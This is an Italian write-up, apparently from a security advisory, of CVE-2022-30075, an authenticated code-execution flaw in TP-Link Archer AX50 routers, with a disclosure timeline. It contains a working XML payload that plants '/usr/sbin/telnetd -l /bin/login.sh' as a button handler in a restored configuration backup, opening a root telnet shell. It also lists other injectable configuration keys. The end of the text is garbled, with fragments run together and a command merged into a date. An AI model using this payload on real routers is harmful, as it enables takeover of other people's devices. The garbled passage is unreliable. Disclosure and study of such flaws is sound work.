
Tp-Link Archer AX50 RCE autenticato (CVE-2022-30075)
Esecuzione remota di codice autenticata sui router Tp-Link
Se il tuo router Tp-Link dispone della funzionalità di backup e ripristino e il firmware è precedente a giugno 2022, probabilmente è vulnerabile
Tp-Link Archer AX50, altri router tplink potrebbero utilizzare un formato diverso dei backup e l'exploit deve essere modificato
Utilizzo dell'exploit per avviare il demone telnet sul router

<button name="led_switch">
<action>pressed</action>
<button>ledswitch</button>
<handler>/lib/led_switch</handler>
</button>
<button name="exploit">
<action>pressed</action>
<button>ledswitch</button>
<handler>/usr/sbin/telnetd -l /bin/login.sh</handler>
</button>
system.button.handler, ma può essere facilmente aggirata cambiando il nome del nodo xml padre (es. name="exploit")system.button.handler, ma anche usando ddns.service.ip_script, firewall.include.path, uhttpd.main e altri.../usr/sbin/telnetd -l /bin/login.shtelnet 192.168.1.115.03.2022 - Vulnerabilità identificata
15.03.2022 - Contattato il supporto Tp-Link
16.03.2022 - Ricevuta risposta da Tp-Link
02.05.2022 - Assegnato CVE
27.05.2022 - Tp-Link ha rilasciato un firmware con la vulnerabilità corretta
07.06.2022 - Pubblicati i dettagli tecnici